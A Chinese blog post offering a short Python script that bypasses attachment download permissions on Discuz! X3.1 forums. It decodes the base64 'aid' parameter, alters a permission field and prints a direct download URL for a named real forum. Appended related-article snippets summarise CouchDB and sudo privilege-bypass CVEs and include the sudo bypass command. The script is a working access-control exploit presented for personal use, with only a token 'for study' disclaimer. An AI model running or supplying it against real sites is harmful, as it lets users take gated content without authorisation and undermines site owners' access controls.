Python 实现 Discuz论坛附件下载权限绕过漏洞


背景:最近压力有些大,想玩点游戏放松下,去Mac论坛下载,发现需要各种权限,于是蛋疼了。

所以,上网查了discuz! x3.1破解,手动替换,发现出现“链接已过期”。所以写了下面程序。

0.将下列代码复制到你的python IDE中。

1.先进网页,chrome浏览器查看网页元素,替换正则表达式内内容。

2.刷新你要下载的页面,右键复制下载链接 url = ‘你复制的链接’

3.运行python,你的IDE里面就会打印出真实下载地址。

运行环境:python3.5

操作系统:macpro 2016

import base64
import re

# 这里是你鼠标单击右键-》保存要下载的链接。替换 url = ‘你复制下来的链接‘
# 其中"第一部分"是‘.forum.php?mod=attachment&aid=‘ "第二部分"是 forum.php?mod=attachment&aid=
# 后面会用到
url = ‘forum.php?mod=attachment&aid=NjE4NzF8NmM2ZDU4Y2Z8MTQ5ODgzNjUyMnwwfDIyMTg3‘

# url0是你要下载的网址的主页,加上"第二部分" 也就是 "forum.php?mod=attachment&aid="
url0 = ‘http://m.tracker.7do.net/forum.php?mod=attachment&aid=‘

# 正则表达,需要将括号内的"第一部分" 也就是 "forum.php\?mod=attachment&aid=" 替换成你复制链接的第一部分
p = r‘(forum.php\?mod=attachment&aid=)(.+)‘
aid = re.search(p, url).group(2)
z = base64.b64decode(aid)

#下面的正则不用管
# print(z)
p = r"(b‘)(.+)(‘)"
z1 = re.search(p, str(z)).group(2)
# print(z1)
p = r"(.+)(\|0\|)(.+)"
z2 = re.search(p,str(z1)).group(1)
p = r"(.+)(\|0\|)(.+)"
z3 = re.search(p,str(z1)).group(3)
# print(z2)
k = z2 + ‘|2|‘ + z3
k = bytes(k, encoding = "utf8")
# print(k)
# k = b‘61871|acf3aa27|1498835323|1|22187‘
j = base64.b64encode(k)
# print(j)
p = r"(b‘)(.+)(‘)"
j1 = re.search(p, str(j)).group(2)
# print(j1)

url1 = url0 + j1
print(url1)

备注:上面破解仅供学习使用,不要用在其他用途,如果侵权,请联系作者,也就是我,我会妥当处理。

不明白过程的,可以看下面的参考资料。

参考资料:

1. python str与bytes之间的转换

2.python中的正则表达式(re模块)

3.Discuz论坛附件下载权限绕过漏洞

时间: 2024-12-17 16:57:41

Python 实现 Discuz论坛附件下载权限绕过漏洞的相关文章

利用Vulnhub复现漏洞 - Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

漏洞原理:Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库.应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序). 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12

(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现

1:查看测试机sudo版本号,确认是受影响版本. 2:创建账号test 3:进入/etc,备份一下sudoers到/root,然后修改sudoers内容,添加: test  ALL=(ALL,!root) /bin/bash 4:登录test账号, sudo -u#4294967295 /bin/bash 受影响的Sudo版本: 1.8.28之前的Sudo版本会受到影响. =======================================参考链接:https://www.sudo.w

PJzhang:CVE-2019-14287 sudo权限绕过漏洞复现

猫宁!!! 参考链接:Ms08067实验室公众号 sudo 1.8.28版本之前有漏洞,很鸡肋的. 更新完kali linux,deepin截图工具失效,只能用自带的,不能划重点. 看一下sudo版本,1.8.23,centos7上操作. 设置密码1234qwer cat /etc/passwd vim /etc/sudoers,test ALL=(ALL,!root) /usr/bin/vim是新添加的,表示test这个用户不是root组,但 切换到test用户 显示如下 就是在冒号后面,加个

使用Snoopy下载论坛附件,并上传到网盘的实例

Snoopy无疑是我使用过的最强大的采集类,本博也做过一些简单的入门介绍. 近日,我完成了数个基于Snoopy的程序,如批量下载百度文档附件.论坛附件下载.本地文件批量上传,已经能比较熟练的使用此类.加上本博主要是做采集程序研究的,那么,有必要将Snoopy的一些高级功能拿出来晒晒,照顾下新人.那今天要演示的一个功能是,Snoopy模拟用户登陆论坛并下载附件,并上传到网盘的一个实例. 通过本例,我们要取得附件上传到网盘以后,返回附件在网盘的下载链接.这个功能,可以和火车采集器无缝结合,实现火车采

Linux下搭建discuz论坛

discuz的论坛环境,可以在lampp系统上直接使用. 前提:先看linux的操作系统是多少位的,然后下载相应的安装包. 现以32位操作系统为例,取32位的xampp安装包xampp-linux-1.8.3-3-installer.run为例说明. Discuz的搭建步骤. 一.linux下搭建lampp软件包 xampp上传到linux的/opt目录下 修改权限并安装 chmode 755 xampp-linux-1.8.3-3-installer.run sudo ./xampp-linu

LAMP-搭建WordPress个人博客、Discuz论坛

要求已经搭建好phpMyAdmin 1 访问http://192.168.27.144/pma界面登入到phpMyAdmin界面; 2 点击上方创建名为wpdb的数据库; 3 点击上方创建名为wpuser管理用户; 4 使wpuser用户对wpdb数据库拥有所有权限; 5 进入wordpress官网https://cn.wordpress.org下载所需安装包,此处使用的是wordpress-4.9.1-zh_CN (1).tar.gz 6 tar zxvf wordpress-4.9.1-zh

装个discuz论坛

LAMP环境是已经编译好的了,接下来装个discuz论坛 1下载个discuz版本wget  http://download.comsenz.com/DiscuzX/3.2/Discuz_X3.2_SC_GBK.zip 2配置虚拟机 vim /usr/local/apache2/conf/httpd.conf --修改配置 Include conf/extra/httpd-vhosts.conf  --去掉#开启虚拟机配置 3给discuz配置一个数据库 chown -R daemon:daem

Couchdb垂直权限绕过到命令执行

0x00couchdb简介 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库.应用广泛. 0x01两个漏洞的关系及原理 CVE-2017-12635垂直越权: CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的.这个漏洞可以让任意用户创建管理员,属于

脚本安装Discuz论坛(shell + Python 实现自动化安装)

实验环境 1.shell 脚本:linux centos 7 系统2.Python shell 脚本:window 系统 3.其他:python selenium 模块,谷歌浏览器, 谷歌浏览器驱动.4.discuz 链接:https://pan.baidu.com/s/1vOwN_f56wJlIzauGrFoR1Q 提取码:mijf 实验步骤 1.上传discuz包到Linux系统/opt目录下 方法一:挂载 方法二:通过Xftp软件上传 2.编写脚本package.sh (可查看上一篇博客,